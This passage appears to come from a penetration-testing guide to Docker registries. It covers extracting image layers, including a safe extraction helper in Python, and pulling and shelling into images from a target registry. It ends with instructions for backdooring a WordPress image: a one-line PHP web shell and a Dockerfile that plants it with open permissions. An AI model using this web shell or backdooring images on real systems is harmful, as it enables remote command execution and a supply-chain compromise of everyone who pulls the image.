Note that when you download and decompress the blobs, files and folders will appear in the current directory. If you download all the blobs and decompress them in the same folder, they will overwrite values from the previously decompressed blobs, so be careful. It may be useful to decompress each blob inside a different folder to inspect the exact content of each blob.
Information gathering using docker
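The following added example (not from the original page) extracts each blob into its own folder, reports the paths that occur in more than one blob (the ones that would be overwritten in a shared folder), and refuses archive members that would land outside the blob's folder. The names `make_blob`, `extract_blobs` and `SAMPLE`, and the sample layers themselves, are constructed for illustration.

```python
import io
import os
import tarfile


def make_blob(files):
    """Build a constructed gzip'd tar layer from {path: bytes} (sample data only)."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w:gz") as tar:
        for path, data in files.items():
            info = tarfile.TarInfo(path)
            info.size = len(data)
            tar.addfile(info, io.BytesIO(data))
    return buf.getvalue()


def extract_blobs(blobs, dest_root):
    """Extract each blob into dest_root/<name>/; return per-layer files, clashes, refusals."""
    per_layer, skipped = {}, []
    for name, data in blobs.items():
        root = os.path.realpath(os.path.join(dest_root, name))
        os.makedirs(root)  # fails if the folder exists, so layers never mix
        per_layer[name] = []
        with tarfile.open(fileobj=io.BytesIO(data), mode="r:*") as tar:
            for m in tar:
                target = os.path.realpath(os.path.join(root, m.name))
                inside = os.path.commonpath([root, target]) == root
                if not inside or not (m.isfile() or m.isdir()):
                    skipped.append((name, m.name))  # traversal, links, devices
                    continue
                if m.isdir():
                    continue  # directories are created on demand below
                os.makedirs(os.path.dirname(target), exist_ok=True)
                with open(target, "wb") as out:
                    out.write(tar.extractfile(m).read())
                per_layer[name].append(m.name)
    # Paths seen in more than one layer would overwrite each other in one folder.
    seen, clashes = set(), set()
    for files in per_layer.values():
        clashes |= seen & set(files)
        seen |= set(files)
    return per_layer, sorted(clashes), skipped


# Constructed sample layers standing in for downloaded registry blobs.
SAMPLE = {
    "blob1": make_blob({"etc/app.conf": b"v1", "run.sh": b"#!/bin/sh\n"}),
    "blob2": make_blob({"etc/app.conf": b"v2", "../escape.txt": b"x"}),
}
```

Call `extract_blobs(SAMPLE, empty_dir)` to try it; for real blobs, pass a dict mapping each blob's name to the bytes of the downloaded file.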
#Once you know which images the server is saving (/v2/_catalog) you can pull them
docker pull 10.10.10.10:5000/ubuntu

#Check the commands used to create the layers of the image
docker history 10.10.10.10:5000/ubuntu
#IMAGE               CREATED             CREATED BY                                      SIZE                COMMENT
#ed05bef01522        2 years ago         ./run.sh                                        46.8MB
#<missing>           2 years ago         /bin/sh -c #(nop)  CMD ["./run.sh"]             0B
#<missing>           2 years ago         /bin/sh -c #(nop)  EXPOSE 80                    0B
#<missing>           2 years ago         /bin/sh -c cp $base/mysql-setup.sh /            499B
#<missing>           2 years ago         /bin/sh -c #(nop) COPY dir:0b657699b1833fd59…   16.2MB

#Run and get a shell
docker run -it 10.10.10.10:5000/ubuntu bash #Leave this shell running
docker ps #Using a different shell
docker exec -it 7d3a81fe42d7 bash #Get a shell inside the docker container
Backdooring WordPress image
In the scenario where you have found a Docker Registry saving a WordPress image, you can backdoor it. Create the backdoor:
<?php echo shell_exec($_GET["cmd"]); ?>
Create a Dockerfile:
FROM 10.10.10.10:5000/wordpress
COPY shell.php /app/
RUN chmod 777 /app/shell.php
Create the new image, check it’s created, and push it: